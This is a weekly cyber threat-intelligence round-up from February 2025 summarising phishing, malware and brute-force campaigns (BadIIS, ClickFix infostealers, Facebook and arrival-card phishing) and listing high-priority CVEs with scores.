New Forrester Report: The External Threat Intelligence Service Providers Landscape

Download

Weekly Cyber Round-up

Intelligence Report

February 13, 2025

Chinese-speaking threat actor manipulates SEO with BadIIS

In 2024, Trend Micro researchers observed the mass distribution of BadIIS in Asia as part of a search engine optimisation (SEO) fraud campaign targeting Internet Information Services (IIS). The most impacted countries include India, Thailand, and Vietnam, among others. Targeted IIS servers include government, universities, technology companies, and telecommunications sector-owned machines. The observed campaign involves threat actors exploiting vulnerable IIS servers to install BadIIS malware on the compromised servers. BadIIS can alter the HTTP response header information requested from the web server by injecting JavaScript code to redirect visitors to malicious sites. Most of the observed variants redirect users to illegal gambling websites, though the researchers warned that the same method could be adapted to redirect users to malicious servers that host malware or phishing schemes.

Get the alert delivered directly to your inbox

Facebook phishing campaign uses copyright infringement to harvest information

Check Point researchers identified a phishing campaign leveraging Facebook to harvest credentials. The campaign began in December 2024 and has since been distributed to more than 12,279 email addresses across hundreds of companies in Europe, the United States, and Australia. Versions of the notifications were also found in Chinese and Arabic. The actors leverage Salesforce’s automated mailing service, without changing the sender ID, to distribute emails from the Salesforce ‘noreply’ email address. The emails use fake versions of the Facebook logo and claim the recipient has violated copyright laws. A link leads to a fake Facebook support page where victims are prompted to enter their credentials.

Large-scale brute force attack campaign targets edge security devices

The Shadowserver Foundation warned of a large-scale brute force attack using around 2.8 million IP addresses that has been active since at least January 2025. The campaign is targeting credentials for a wide range of networking devices, including ones from Palo Alto Networks, Ivanti, and SonicWall. The majority of IP addresses, 1.1 million, are from Brazil, with a large amount also coming from Turkey, Russia, Argentina, Morrocco, and Mexico. The attacking IP addresses are spread across many networks and Autonomous Systems, and are likely part of a botnet or an operation associated with residential proxy networks. The attacks are mainly conducted by MikroTik, Huawei, Cisco, Boa, and ZTE routers and Internet of Things devices. 

DeepSeek ClickFix campaign delivers Vidar and Lumma Stealer

CloudSEK researchers observed threat actors exploiting DeepSeek’s brand name to launch phishing campaigns that deliver infostealer malware like Vidar Stealer and Lumma Stealer. The campaigns involve investment scheme lures and leverage the ClickFix technique. One such campaign involves a fake DeepSeek site for a supposed partnership programme. Clicking on the ‘Verificate’ button opens a fake CAPTCHA prompt that copies a malicious PowerShell command, which the user is asked to paste into the Run command dialog box. The fake domain used in the campaign was hosted behind Cloudflare to evade detection from artificial intelligence-based search engines.

Phishing campaign targets travelers with arrival card lure to steal data

Cofense researchers detailed an ongoing phishing campaign that has been targeting travelers to Singapore since at least September 2023. The campaign is highly targeted and has since expanded to also target travelers to Malaysia and the UK. The campaign involves phishing emails claiming more information is required as part of an immigration arrival card application. The emails redirect to a phishing page impersonating Singapore’s official Immigration & Checkpoint Authority website. Users are then asked to provide sensitive information, such as credit card details, to pay for a supposed processing fee. Parts of the fake portal are auto-filled with personally identifiable information to make it appear more legitimate.

High Priority Vulnerabilities

Name name Software Base
Score
Temp
Score
CVE-2025-24200 iPadOS 4.6 3.8
Related: Apple fixes zero-day exploited in ‘extremely sophisticated’ attacks
CVE-2025-21418 Windows 7.8 7.5
Related: Microsoft February 2025 Patch Tuesday fixes 4 zero-days, 55 flaws
CVE-2025-0994 Cityworks 8.8 6.9
Related: CISA Warns of Active Exploitation in Trimble Cityworks Vulnerability Leading to IIS RCE
CVE-2023-49103 graphapi 10.0 5.1
Related: ThinkPHP and ownCloud flaws actively exploited
CVE-2025-0282 Neurons for ZTA gateways 9.0 7.7
Related: Hackers Exploiting Ivanti Connect Secure RCE Vulnerability to Install SPAWNCHIMERA Malware

Get the full report
delivered to your inbox​

By filling out and submitting this request you give us your consent to use and store the information  you have provided for the purpose set out above or in connection with it. For more information, see our Privacy Policy.

Silobreaker Weekly Cyber Round-up

Get the latest updates on ransomware, hacker groups, leaks and breaches and vulnerabilities
Sign up

Request a demo